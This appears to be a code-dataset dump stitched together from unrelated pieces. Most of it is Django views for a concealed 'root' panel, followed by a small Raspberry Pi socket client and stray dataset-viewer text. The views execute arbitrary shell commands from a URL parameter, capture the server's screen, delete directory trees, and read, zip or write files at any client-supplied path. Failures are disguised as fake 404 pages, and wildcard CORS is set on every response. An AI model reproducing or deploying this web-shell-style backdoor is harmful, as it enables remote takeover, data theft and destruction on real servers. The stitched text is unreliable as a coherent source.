                a = request.GET.get("a")
                b = request.GET.get("b")
                # FIX: restore make_password — the anonymised "<PASSWORD>(a)"
                # placeholder was not valid Python; make_password is imported
                # at module top alongside check_password.
                response = HttpResponse(json.dumps({"code": "1", "pwd": make_password(a), "flag": check_password(a, b)}))
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as e:
        print(e)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    response["Access-Control-Allow-Origin"] = "*"
    response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
    response["Access-Control-Max-Age"] = "1000"
    response["Access-Control-Allow-Headers"] = "*"
    return response
def LoginRoot(request):
    """Validate root credentials and mark the session as root.

    Query params: ``a`` = plaintext password, ``b`` = stored hash.
    On success stores the root token in the session and returns
    JSON ``{"code": "1"}``; every failure path responds 404.
    """
    try:
        id = request.session.get("id")
        if id != None:
            per = User.objects.get(id=id)
            if per.isroot == '1':
                a = request.GET.get("a")
                b = request.GET.get("b")
                if check_password(a, b):
                    request.session['root'] = pwd
                    response = HttpResponse(json.dumps({"code": "1"}))
                else:
                    response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            # FIX: the original had no branch for an anonymous session, so
            # ``response`` was never bound and the header assignments below
            # (outside the try) raised an unhandled NameError. Mirror the
            # 404 used by the sibling views (e.g. Code).
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as e:
        print(e)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    response["Access-Control-Allow-Origin"] = "*"
    response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
    response["Access-Control-Max-Age"] = "1000"
    response["Access-Control-Allow-Headers"] = "*"
    return response
def LogoutRoot(request):
    """Drop the root flag from the session; 404 when it was not set."""
    try:
        del request.session["root"]
        response = HttpResponse(json.dumps({"code": "1"}))
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
#####################################################################################################################################
def DelDir(path):
    """Recursively delete *path* and everything below it.

    Walks bottom-up so files and child directories are removed before
    their parents, then removes *path* itself.
    """
    for base, subdirs, filenames in os.walk(path, topdown=False):
        for fname in filenames:
            os.remove(os.path.join(base, fname))
        for dname in subdirs:
            os.rmdir(os.path.join(base, dname))
    os.rmdir(path)
def Prt(request):
    """Grab a screenshot of the server desktop and return it as an <img> tag.

    Requires both a logged-in user with isroot == '1' and the root session
    token; every failure path responds 404. The image is written under
    ``prturl`` named after the current timestamp.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                import time
                from PIL import ImageGrab
                try:
                    os.makedirs(prturl)
                except:
                    pass  # directory already exists
                stamp = time.time()
                ImageGrab.grab().save(prturl + str(stamp) + '.jpg')
                response = HttpResponse("<img src='/static/Root/Prt/" + str(stamp) + ".jpg'/>")
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
def Del(request):
    """Wipe the entire root static directory tree (root session required).

    Responds "OK" on success and 404 on any authentication failure or error.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                DelDir(rooturl)
                response = HttpResponse("OK")
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
#####################################################################################################################################################
def CMD(request):
    """Run a shell command from the ``cmd`` query param and return its output.

    NOTE(security): this is remote command execution by design, guarded only
    by the isroot flag plus the root session token — keep it disabled outside
    fully trusted deployments.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                response = HttpResponse(os.popen(request.GET.get("cmd")))
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
#################################################################################################################################################
def FTP(request, url):
    """Render a directory-listing page for *url* (root session required).

    Splits the entries of *url* into directories (PathItem) and files
    (FileItem) and renders them through the FTP.html template. Every
    authentication failure or error responds 404.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                current = url
                dirs, files = [], []
                for entry in os.listdir(current):
                    if os.path.isdir(os.path.join(current, entry)):
                        dirs.append(PathItem(entry, current))
                    else:
                        files.append(FileItem(entry, current))
                context_dic = {'current': current, 'path': dirs, 'file': files}
                return render(request, 'FTP.html', context_dic)
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every non-rendered response.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
#################################################################################################################################################
def FTPDownload(request, url):
    """Stream the file at *url* back to the client as an octet-stream.

    Root session required; every failure path responds 404. The file
    handle is owned (and closed) by the FileResponse.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                response = FileResponse(open(url, 'rb'))
                response['Content-Type'] = 'application/octet-stream'
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
#################################################################################################################################################
def dfs_get_zip_file(input_path, result):
    """Collect every path below *input_path* into *result*, depth-first.

    Files are appended directly; each sub-directory is appended after its
    own contents (post-order). Paths are joined with '/' as in the original.
    """
    for entry in os.listdir(input_path):
        child = input_path + '/' + entry
        if os.path.isdir(child):
            dfs_get_zip_file(child, result)
        result.append(child)
def zip_path(input_path, output_path, output_name):
    """Zip the whole tree under *input_path* into output_path/output_name.

    Entries are stored under their full on-disk paths (no arcname
    rewriting). Returns the path of the created archive.
    """
    archive = output_path + '/' + output_name
    entries = []
    dfs_get_zip_file(input_path, entries)
    zf = zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED)
    for entry in entries:
        zf.write(entry)
    zf.close()
    return archive
def FTPDownloadDir(request, url):
    """Zip the directory *url* into a temp archive and send it as Download.zip.

    Root session required; every failure path responds 404. The archive is
    written under ``tempurl`` named after the current timestamp, and its
    handle is owned (and closed) by the FileResponse.
    """
    try:
        id = request.session.get("id")
        root = request.session.get("root")
        if id is not None and root is not None:
            per = User.objects.get(id=id)
            if per.isroot == '1' and root == pwd:
                import time
                stamp = str(time.time())
                try:
                    os.makedirs(tempurl)
                except:
                    pass  # directory already exists
                zip_path(url, tempurl, stamp + '.zip')
                response = FileResponse(open(os.path.join(tempurl, stamp + '.zip'), 'rb'))
                response['Content-Type'] = 'application/octet-stream'
                response['Content-Disposition'] = 'attachment;filename="Download.zip"'
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as err:
        print(err)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    for header, value in (("Access-Control-Allow-Origin", "*"),
                          ("Access-Control-Allow-Methods", "POST, GET, OPTIONS"),
                          ("Access-Control-Max-Age", "1000"),
                          ("Access-Control-Allow-Headers", "*")):
        response[header] = value
    return response
def Upload(request,url):
    """Receive a multipart upload ("myfile") and write it into directory *url*.

    NOTE(review): unlike the other root views, this one checks only
    ``isroot`` and not the root session token — confirm whether that is
    intentional before hardening. POST only; every other path responds 404.
    """
    try:
        id = request.session.get("id")
        if id != None:
            per = User.objects.get(id=id)
            if per.isroot == '1':
                if request.method == "POST":
                    myFile = request.FILES.get("myfile", None)
                    if not myFile:
                        response = HttpResponse("no files for upload!")
                    else:
                        # FIX: use a context manager so the handle is closed
                        # even when a chunk write fails (the original leaked
                        # it on error).
                        with open(os.path.join(url, myFile.name), 'wb+') as destination:
                            for chunk in myFile.chunks():
                                destination.write(chunk)
                        # FIX: was the doubled statement
                        # "response = response = HttpResponse(...)".
                        response = HttpResponse("upload over!")
                else:
                    response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>", status=404)
            else:
                response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
        else:
            response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    except Exception as e:
        print(e)
        response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
    # Permissive CORS headers applied to every response of this view.
    response["Access-Control-Allow-Origin"] = "*"
    response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
    response["Access-Control-Max-Age"] = "1000"
    response["Access-Control-Allow-Headers"] = "*"
    return response
| StarcoderdataPython |
print("connect setup")
import socket
# Target address of the Raspberry Pi server (link-local address).
HOST, PORT = "169.254.44.240", 9999
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("trying to establish a connection")
try:
    sock.connect((HOST, PORT))
    print("connect ready")
except OSError:
    # FIX: narrowed from a bare except — connection failures raise OSError
    # subclasses; the bare form also swallowed KeyboardInterrupt/SystemExit.
    print("CONNECTION FAILED.")
    print("have you run the code on the raspberry pi?")
    print("P.S. dont break the pi please")
print(sock)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.